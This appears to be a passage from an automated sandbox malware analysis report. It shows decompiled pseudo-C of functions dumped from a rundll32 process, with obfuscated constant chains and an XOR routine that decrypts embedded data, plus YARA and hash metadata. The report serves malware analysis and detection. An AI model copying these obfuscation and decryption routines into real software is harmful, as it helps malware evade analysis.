						if(_t72 == 0x1db47164) {
							_t72 = 0xffebff;
							continue;
						} else {
							if(_t72 != 0x28d16d2c) {
								goto L8;
							} else {
								_t71 = _t71 + E02006B54(_t65 + 4, _v12, _v20);
							}
						}
						L5:
						return _t71;
					}
					_t60 = E02002493();
					_t74 = _t74 - 0xc + 0xc;
					_t72 = 0x28d16d2c;
					_t71 = _t71 + _t60;
					L8:
				} while (_t72 != 0x306bf85d);
				goto L5;
			}















                                                                      0x02000672
                                                                      0x02000672
                                                                      0x02000675
                                                                      0x0200067f
                                                                      0x02000687
                                                                      0x0200068f
                                                                      0x02000697
                                                                      0x0200069f
                                                                      0x020006a7
                                                                      0x020006af
                                                                      0x020006c1
                                                                      0x020006c9
                                                                      0x020006cb
                                                                      0x020006cf
                                                                      0x020006d1
                                                                      0x020006de
                                                                      0x020006eb
                                                                      0x020006f3
                                                                      0x020006f8
                                                                      0x02000700
                                                                      0x02000708
                                                                      0x02000710
                                                                      0x02000718
                                                                      0x02000720
                                                                      0x02000728
                                                                      0x02000730
                                                                      0x02000738
                                                                      0x02000742
                                                                      0x02000746
                                                                      0x0200074e
                                                                      0x0200074e
                                                                      0x02000754
                                                                      0x02000779
                                                                      0x00000000
                                                                      0x02000756
                                                                      0x02000758
                                                                      0x00000000
                                                                      0x0200075a
                                                                      0x0200076d
                                                                      0x0200076d
                                                                      0x02000758
                                                                      0x0200076f
                                                                      0x02000778
                                                                      0x02000778
                                                                      0x02000790
                                                                      0x02000795
                                                                      0x02000798
                                                                      0x0200079a
                                                                      0x0200079c
                                                                      0x0200079c
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'RH,$m}
                                                                      • API String ID: 0-2515829961
                                                                      • Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction ID: e1237506397d8c8bc3f4ee58e299ad9b5d85f4f372d38687a1c8b7edcf628da9
                                                                      • Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction Fuzzy Hash: C9316E729093028BE364DF28E88550BFBE1BBC4714F114A2DE5D9A3260D3759A098F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0023FBE6, Relevance: 2.6, Strings: 2, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 'RH,$m}
                                                                      • API String ID: 0-2515829961
                                                                      • Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction ID: 4a3fdf8551dd2161e5c8d4c372bcb364cf34f9435d668468c7e62f635a9d8fce
                                                                      • Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
                                                                      • Instruction Fuzzy Hash: 2D316EB29093068BD364DE29E54540BFBE0BBD4714F114A2DE9D5A3260D3B58A198F93
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002434BF, Relevance: 2.6, Strings: 2, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *!$k3
                                                                      • API String ID: 0-1396716965
                                                                      • Opcode ID: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
                                                                      • Instruction ID: 4edee88e6a4cb64f55211fa3ea517c23a493d99d838bed560c24fd7fe0c3b96f
                                                                      • Opcode Fuzzy Hash: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
                                                                      • Instruction Fuzzy Hash: D5313A724083029FD318DF29D44941BFBE4BB94758F518A0DF1D59B2A1D3B48A4ACF87
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02004A9E, Relevance: 1.4, Strings: 1, Instructions: 114COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E02004A9E(void* __edx, void* __eflags, signed int* _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* __ecx;
				void* _t100;
				intOrPtr _t114;
				signed int _t117;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t142;
				intOrPtr _t143;
				intOrPtr _t147;

				_push(_a16);
				_push(0x2010000);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E02002550(_t100);
				_v40 = _v40 & 0x00000000;
				_v44 = 0x156874;
				_v20 = 0x9c2a;
				_v20 = _v20 << 5;
				_t123 = 0x35;
				_v20 = _v20 / _t123;
				_v20 = _v20 ^ 0x00002bb4;
				_v36 = 0xf1e6;
				_v36 = _v36 + 0xffff56d9;
				_v36 = _v36 ^ 0x00000861;
				_v8 = 0x90c5;
				_t124 = 0x75;
				_v8 = _v8 * 0xa;
				_v8 = _v8 ^ 0x847d0871;
				_v8 = _v8 + 0xb0b6;
				_v8 = _v8 ^ 0x847969bf;
				_v32 = 0xdffe;
				_t125 = 0x5f;
				_v32 = _v32 / _t124;
				_v32 = _v32 ^ 0x21a7c3f7;
				_v32 = _v32 ^ 0x21a7f23e;
				_v28 = 0x83e8;
				_v28 = _v28 >> 0xe;
				_v28 = _v28 ^ 0xeff97ecd;
				_v28 = _v28 ^ 0xeff95885;
				_v16 = 0x2648;
				_v16 = _v16 * 0x3e;
				_t126 = 9;
				_v16 = _v16 / _t125;
				_v16 = _v16 ^ 0x58b3f5ba;
				_v16 = _v16 ^ 0x58b39d5c;
				_v12 = 0x62ef;
				_v12 = _v12 | 0xb941bdbf;
				_v12 = _v12 << 7;
				_v12 = _v12 | 0x29e74872;
				_v12 = _v12 ^ 0xa9ffcd1d;
				_v24 = 0x928c;
				_v24 = _v24 / _t126;
				_v24 = _v24 + 0xb150;
				_v24 = _v24 ^ 0x0000c198;
				_t142 = 0x34;
				_t114 = E01FF54FB(_t142);
				 *0x201108c = _t114;
				if(_t114 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t114 + 0x20)) = 0x2010000;
				 *((intOrPtr*)(_t114 + 0x24)) = 0x2010000;
				_t143 =  *0x201108c;
				_t147 =  *((intOrPtr*)(_t143 + 0x20));
				 *(_t143 + 4) = _v24;
				_t117 =  *(_t143 + 0x14);
				while( *((intOrPtr*)(_t147 + _t117 * 8)) != 0) {
					_t117 = _t117 + 1;
					 *(_t143 + 0x14) = _t117;
				}
				if(E01FF67EF(_a4, _v8, _v32, _v28) == 0) {
					E01FFDE81(_v16,  *0x201108c, _v12);
					goto L7;
				}
				return 1;
			}
























                                                                      0x02004aa5
                                                                      0x02004aad
                                                                      0x02004aae
                                                                      0x02004ab1
                                                                      0x02004ab4
                                                                      0x02004ab6
                                                                      0x02004abb
                                                                      0x02004ac1
                                                                      0x02004ac8
                                                                      0x02004acf
                                                                      0x02004ad8
                                                                      0x02004add
                                                                      0x02004ae2
                                                                      0x02004ae9
                                                                      0x02004af0
                                                                      0x02004af7
                                                                      0x02004afe
                                                                      0x02004b09
                                                                      0x02004b0c
                                                                      0x02004b0f
                                                                      0x02004b16
                                                                      0x02004b1d
                                                                      0x02004b24
                                                                      0x02004b30
                                                                      0x02004b31
                                                                      0x02004b36
                                                                      0x02004b3d
                                                                      0x02004b44
                                                                      0x02004b4b
                                                                      0x02004b4f
                                                                      0x02004b56
                                                                      0x02004b5d
                                                                      0x02004b6a
                                                                      0x02004b72
                                                                      0x02004b73
                                                                      0x02004b78
                                                                      0x02004b82
                                                                      0x02004b89
                                                                      0x02004b90
                                                                      0x02004b97
                                                                      0x02004b9b
                                                                      0x02004ba2
                                                                      0x02004ba9
                                                                      0x02004bb7
                                                                      0x02004bba
                                                                      0x02004bc1
                                                                      0x02004bce
                                                                      0x02004bcf
                                                                      0x02004bd4
                                                                      0x02004bdc
                                                                      0x02004c30
                                                                      0x00000000
                                                                      0x02004c30
                                                                      0x02004bde
                                                                      0x02004be1
                                                                      0x02004be7
                                                                      0x02004bed
                                                                      0x02004bf0
                                                                      0x02004bf3
                                                                      0x02004bfc
                                                                      0x02004bf8
                                                                      0x02004bf9
                                                                      0x02004bf9
                                                                      0x02004c17
                                                                      0x02004c2a
                                                                      0x00000000
                                                                      0x02004c2f
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: rH)
                                                                      • API String ID: 0-3429678651
                                                                      • Opcode ID: a4336280ae81ac6a4a3b290b08724f85ebff7e0f81ff02567f12bb6ccab53824
                                                                      • Instruction ID: 7214109069f9fad5add82d30ed37ca4725c174400a7585d0b61fd3eb27913170
                                                                      • Opcode Fuzzy Hash: a4336280ae81ac6a4a3b290b08724f85ebff7e0f81ff02567f12bb6ccab53824
                                                                      • Instruction Fuzzy Hash: D7513675D0030AEFEB08CFA4C9455AEBBB1FF44310F208159D515AB2A0DBB99A45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00244012, Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: rH)
                                                                      • API String ID: 0-3429678651
                                                                      • Opcode ID: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
                                                                      • Instruction ID: 7354fe3c1ef40b1cded09fd10f1bd40bcbb76b1f837cb96132a612beaf0a9fb8
                                                                      • Opcode Fuzzy Hash: a9c3be9c37764caaac0b5c82abcb2aefc8fd1c7a0dc47e201cdc7581efa4c114
                                                                      • Instruction Fuzzy Hash: F0513775D1021AEFEF08DFA4C9465EEBBB2FF44310F208159E415AB290D7B89A51CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 020047B5, Relevance: 1.4, Strings: 1, Instructions: 112COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 86%
                                                                      			E020047B5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v592;
				void* _t127;
				void* _t133;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t127);
				_v68 = _v68 & 0x00000000;
				_v64 = _v64 & 0x00000000;
				_v72 = 0x50be0a;
				_v24 = 0xa904;
				_v24 = _v24 + 0xe5cc;
				_v24 = _v24 ^ 0x597c5b93;
				_push(0x1ff142c);
				_v24 = _v24 * 0x54;
				_v24 = _v24 ^ 0x5d49852f;
				_v32 = 0x6077;
				_v32 = _v32 + 0xffffd427;
				_v32 = _v32 + 0x605a;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x253e0470;
				_v16 = 0x766e;
				_v16 = _v16 ^ 0x0e68fc54;
				_v16 = _v16 + 0x5b78;
				_v16 = _v16 + 0xffff6155;
				_v16 = _v16 ^ 0x0e6822fb;
				_v36 = 0x46d0;
				_v36 = _v36 | 0xbf6b54fd;
				_v36 = _v36 >> 4;
				_v36 = _v36 + 0xffffefba;
				_v36 = _v36 ^ 0x0bf6ca05;
				_v60 = 0xe881;
				_v60 = _v60 + 0xb91a;
				_v60 = _v60 ^ 0x0001fd39;
				_v48 = 0xb097;
				_v48 = _v48 ^ 0xf0f26416;
				_v48 = _v48 ^ 0xf0f2a086;
				_v12 = 0xfe0b;
				_v12 = _v12 * 0x6d;
				_v12 = _v12 + 0xe3c7;
				_v12 = _v12 + 0xffff63fe;
				_v12 = _v12 ^ 0x006c422a;
				_v40 = 0xb7e6;
				_v40 = _v40 ^ 0x86f830c6;
				_v40 = _v40 ^ 0x86f8ac5d;
				_v28 = 0xaa43;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0xaa541b7f;
				_v28 = _v28 + 0xffff7b49;
				_v28 = _v28 ^ 0xaa53dcd3;
				_v56 = 0xcf43;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x003b1f16;
				_v20 = 0xfc45;
				_v20 = _v20 + 0xffba;
				_v20 = _v20 + 0xaf52;
				_v20 = _v20 >> 0xc;
				_v20 = _v20 ^ 0x00007f51;
				_v52 = 0x343e;
				_v52 = _v52 + 0xffff8ecd;
				_v52 = _v52 ^ 0xffffad90;
				_v44 = 0x9594;
				_v44 = _v44 * 0x28;
				_v44 = _v44 ^ 0x001772e3;
				_v8 = 0x6cd9;
				_v8 = _v8 + 0xffff1db8;
				_v8 = _v8 + 0xffffd279;
				_v8 = _v8 ^ 0xb0257305;
				_v8 = _v8 ^ 0x4fda3672;
				_push(_v36);
				_push(_v16);
				_t133 = E01FF5DFC(_v24, _v32, _v8);
				E01FFECBD(_v60, _v8, _v24, _v48, _v12,  &_v592, _v40, __edx);
				E02000D6D(_v28, _v56, _v20, _t133);
				return E01FFEB1E(_v52, _v44, _v8,  &_v592);
			}























                                                                      0x020047c0
                                                                      0x020047c5
                                                                      0x020047c8
                                                                      0x020047cb
                                                                      0x020047cc
                                                                      0x020047cd
                                                                      0x020047d2
                                                                      0x020047d6
                                                                      0x020047da
                                                                      0x020047e1
                                                                      0x020047e8
                                                                      0x020047ef
                                                                      0x020047fa
                                                                      0x020047ff
                                                                      0x02004802
                                                                      0x02004809
                                                                      0x02004810
                                                                      0x02004817
                                                                      0x0200481e
                                                                      0x02004822
                                                                      0x02004829
                                                                      0x02004830
                                                                      0x02004837
                                                                      0x0200483e
                                                                      0x02004845
                                                                      0x0200484c
                                                                      0x02004853
                                                                      0x0200485a
                                                                      0x0200485e
                                                                      0x02004865
                                                                      0x0200486c
                                                                      0x02004873
                                                                      0x0200487a
                                                                      0x02004881
                                                                      0x02004888
                                                                      0x0200488f
                                                                      0x02004896
                                                                      0x020048a1
                                                                      0x020048a4
                                                                      0x020048ab
                                                                      0x020048b2
                                                                      0x020048b9
                                                                      0x020048c0
                                                                      0x020048c7
                                                                      0x020048ce
                                                                      0x020048d5
                                                                      0x020048d9
                                                                      0x020048e0
                                                                      0x020048e7
                                                                      0x020048ee
                                                                      0x020048f9
                                                                      0x020048fc
                                                                      0x02004903
                                                                      0x0200490a
                                                                      0x02004911
                                                                      0x02004918
                                                                      0x0200491c
                                                                      0x02004923
                                                                      0x0200492a
                                                                      0x02004931
                                                                      0x02004938
                                                                      0x02004943
                                                                      0x02004946
                                                                      0x0200494d
                                                                      0x02004954
                                                                      0x0200495b
                                                                      0x02004962
                                                                      0x02004969
                                                                      0x02004970
                                                                      0x02004973
                                                                      0x0200497c
                                                                      0x0200499d
                                                                      0x020049ac
                                                                      0x020049ce

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *Bl
                                                                      • API String ID: 0-1288706768
                                                                      • Opcode ID: 2d87b3f245fd69920e9e29bb4057e6ff342838413f7cad5c5b80aa8976cae807
                                                                      • Instruction ID: 143958f35c019c951fc7aa3bd93f01dc3255f64cc565685ef0bb7f70b2964844
                                                                      • Opcode Fuzzy Hash: 2d87b3f245fd69920e9e29bb4057e6ff342838413f7cad5c5b80aa8976cae807
                                                                      • Instruction Fuzzy Hash: C251DDB2C0130EABDF54CFA5D9898EEBBB1FF48314F208158E515762A0D3B95A49CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02002631, Relevance: 1.3, Strings: 1, Instructions: 91COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E02002631(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _t92;
				signed int _t109;
				signed int _t110;
				void* _t119;
				signed int _t120;
				void* _t123;

				_t123 = __eflags;
				_push(_a8);
				_t119 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02002550(_t92);
				_v44 = _v44 & 0x00000000;
				_v56 = 0x428c97;
				_v52 = 0x699918;
				_v48 = 0x4b9b3f;
				_v16 = 0x691;
				_t109 = 0x25;
				_v16 = _v16 * 0x4b;
				_v16 = _v16 * 0x44;
				_v16 = _v16 ^ 0x0082d99d;
				_v24 = 0xda4d;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xa7aa;
				_v24 = _v24 ^ 0x00009b39;
				_v20 = 0x8ab8;
				_v20 = _v20 + 0xbc5;
				_v20 = _v20 + 0x8be6;
				_v20 = _v20 ^ 0x00013aa9;
				_v12 = 0x3e92;
				_v12 = _v12 * 0x48;
				_v12 = _v12 + 0xffff6b24;
				_v12 = _v12 | 0xd8f0c2a4;
				_v12 = _v12 ^ 0xd8f1a727;
				_v36 = 0x20a;
				_v36 = _v36 ^ 0x637f1cbb;
				_v36 = _v36 ^ 0x637f1131;
				_v8 = 0x38cb;
				_v8 = _v8 ^ 0x7b367a31;
				_v8 = _v8 << 1;
				_v8 = _v8 / _t109;
				_v8 = _v8 ^ 0x06a897b6;
				_v28 = 0xa730;
				_v28 = _v28 << 5;
				_v28 = _v28 + 0x5f1e;
				_v28 = _v28 ^ 0x00154d8c;
				_v40 = E01FFA156();
				_v32 = 0xde76;
				_v32 = _v32 + 0x8a52;
				_v32 = _v32 ^ 0x000168cc;
				_v16 = 0x1d5e;
				_t110 = 7;
				_v16 = _v16 / _t110;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x00000053;
				_t120 = E01FFDF8A(_t110, _v16 % _t110, _t123, _v16, _v32);
				E02009A27( &_v40, 1, _v12, _t120, _t119, _v36, _v8, _v28);
				 *((short*)(_t119 + _t120 * 2)) = 0;
				return 0;
			}






















                                                                      0x02002631
                                                                      0x02002639
                                                                      0x0200263c
                                                                      0x0200263e
                                                                      0x02002641
                                                                      0x02002642
                                                                      0x02002643
                                                                      0x02002648
                                                                      0x0200264e
                                                                      0x02002655
                                                                      0x0200265c
                                                                      0x02002663
                                                                      0x02002670
                                                                      0x02002671
                                                                      0x02002678
                                                                      0x0200267b
                                                                      0x02002682
                                                                      0x02002689
                                                                      0x0200268d
                                                                      0x02002694
                                                                      0x0200269b
                                                                      0x020026a2
                                                                      0x020026a9
                                                                      0x020026b0
                                                                      0x020026b7
                                                                      0x020026c2
                                                                      0x020026c5
                                                                      0x020026cc
                                                                      0x020026d3
                                                                      0x020026da
                                                                      0x020026e1
                                                                      0x020026e8
                                                                      0x020026ef
                                                                      0x020026f6
                                                                      0x020026fd
                                                                      0x02002705
                                                                      0x02002708
                                                                      0x0200270f
                                                                      0x02002716
                                                                      0x0200271a
                                                                      0x02002721
                                                                      0x02002730
                                                                      0x02002735
                                                                      0x0200273c
                                                                      0x02002743
                                                                      0x0200274a
                                                                      0x02002756
                                                                      0x02002759
                                                                      0x0200275c
                                                                      0x02002760
                                                                      0x02002778
                                                                      0x0200278b
                                                                      0x02002795
                                                                      0x0200279e

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1z6{
                                                                      • API String ID: 0-2122224799
                                                                      • Opcode ID: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
                                                                      • Instruction ID: 8540b6a95c800ea604097344eae72f1fe1a85b94da57b0fd3f6f869fb4f05580
                                                                      • Opcode Fuzzy Hash: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
                                                                      • Instruction Fuzzy Hash: BD41FFB1D00209EBEF04CFE6C94A5EEBBB1BF84308F108199D425B62A0D7B90B45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00241BA5, Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1z6{
                                                                      • API String ID: 0-2122224799
                                                                      • Opcode ID: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
                                                                      • Instruction ID: 5da534b21e1eddf842ef60467de7fe7ef259b7345eb49c1ee4d1c7c0be31a243
                                                                      • Opcode Fuzzy Hash: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
                                                                      • Instruction Fuzzy Hash: 0C4100B1D00209EBEF04CFE5C94A5EEBBB5FB84308F108199E511B6290D7B80B55CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200A966, Relevance: 1.3, Strings: 1, Instructions: 88COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 81%
                                                                      			E0200A966(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t38;
				signed int _t42;
				signed int _t48;
				signed int* _t51;
				signed int _t53;
				void* _t60;
				signed int _t64;
				signed int _t65;
				void* _t71;
				intOrPtr _t72;
				signed int* _t74;
				unsigned int _t77;
				signed int _t80;

				_t51 = _a16;
				_push(_t51);
				_push(_a12);
				_push(_a8);
				_push(0x1ff10ec);
				_push(__edx);
				_t38 = E02002550(0x1ff10ec);
				_push(_t51);
				_push(_t38);
				E02002550(_t38);
				_v12 = 0x4b1aac;
				_t72 = 0;
				_v8 = 0x6e8720;
				_v4 = 0;
				_v28 = 0x88f3;
				_v28 = _v28 >> 2;
				_v28 = _v28 ^ 0x975e54be;
				_v28 = _v28 + 0xe7d8;
				_v28 = _v28 ^ 0x975f6258;
				_v24 = 0xe148;
				_t53 = 0x36;
				_v24 = _v24 / _t53;
				_v24 = _v24 ^ 0x00006f46;
				_t42 =  *0x1ff10ec; // 0x7d7b62b8
				_t64 =  *0x1ff10f0; // 0x7d7b62d2
				_t65 = _t64 ^ _t42;
				_v20 = _t42;
				_v16 = _t65;
				_t77 =  !=  ? (_t65 & 0xfffffffc) + 4 : _t65;
				_t48 = E01FF54FB(_t77);
				_v24 = _t48;
				if(_t48 != 0) {
					_t74 = 0x1ff10f4;
					_t71 =  <  ? 0 :  &(0x1ff10f4[_t77 >> 2]) - 0x1ff10f4 + 3 >> 2;
					if(_t71 != 0) {
						_t80 = _v20;
						_t60 = _t48 - 0x1ff10f4;
						do {
							_t72 = _t72 + 1;
							 *(_t60 + _t74) =  *_t74 ^ _t80;
							_t34 =  &(_t74[1]); // 0x21a8adb8
							_t74 = _t34;
						} while (_t72 < _t71);
						_t48 = _v24;
					}
					if(_t51 != 0) {
						 *_t51 = _v16;
						return _t48;
					}
				}
				return _t48;
			}























                                                                      0x0200a96a
                                                                      0x0200a975
                                                                      0x0200a976
                                                                      0x0200a97a
                                                                      0x0200a97e
                                                                      0x0200a97f
                                                                      0x0200a981
                                                                      0x0200a986
                                                                      0x0200a987
                                                                      0x0200a988
                                                                      0x0200a98d
                                                                      0x0200a995
                                                                      0x0200a997
                                                                      0x0200a9a1
                                                                      0x0200a9a5
                                                                      0x0200a9ad
                                                                      0x0200a9b2
                                                                      0x0200a9ba
                                                                      0x0200a9c2
                                                                      0x0200a9ca
                                                                      0x0200a9d8
                                                                      0x0200a9db
                                                                      0x0200a9df
                                                                      0x0200a9e7
                                                                      0x0200a9ec
                                                                      0x0200a9f2
                                                                      0x0200a9f4
                                                                      0x0200a9fa
                                                                      0x0200aa0b
                                                                      0x0200aa1b
                                                                      0x0200aa20
                                                                      0x0200aa27
                                                                      0x0200aa2d
                                                                      0x0200aa47
                                                                      0x0200aa4c
                                                                      0x0200aa4e
                                                                      0x0200aa54
                                                                      0x0200aa56
                                                                      0x0200aa5a
                                                                      0x0200aa5b
                                                                      0x0200aa5e
                                                                      0x0200aa5e
                                                                      0x0200aa61
                                                                      0x0200aa65
                                                                      0x0200aa65
                                                                      0x0200aa6c
                                                                      0x0200aa72
                                                                      0x00000000
                                                                      0x0200aa72
                                                                      0x0200aa6c
                                                                      0x0200aa7a

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Fo
                                                                      • API String ID: 0-989300405
                                                                      • Opcode ID: 82294903065e47e8895b5bd65213128193e5f3d466d4026489f5734ff717f7d1
                                                                      • Instruction ID: dad7a9e6c5358501a0ba313421a81f5412c47e619dda647ac40e55ebc34e3c62
                                                                      • Opcode Fuzzy Hash: 82294903065e47e8895b5bd65213128193e5f3d466d4026489f5734ff717f7d1
                                                                      • Instruction Fuzzy Hash: 2431CF717083449FE754DF6AC88085BBBEAEFC8304F80892DF98983294DB75D8068B12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00249EDA, Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Fo
                                                                      • API String ID: 0-989300405
                                                                      • Opcode ID: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
                                                                      • Instruction ID: 49e3a59814c74bb21fffed7e500de0c18d81bb99cc272e06e312731783513348
                                                                      • Opcode Fuzzy Hash: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
                                                                      • Instruction Fuzzy Hash: D431DFB1618341AFE758DF29C88185BBBEAEBC8304F80892DF485C3654DB75D80ACF12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

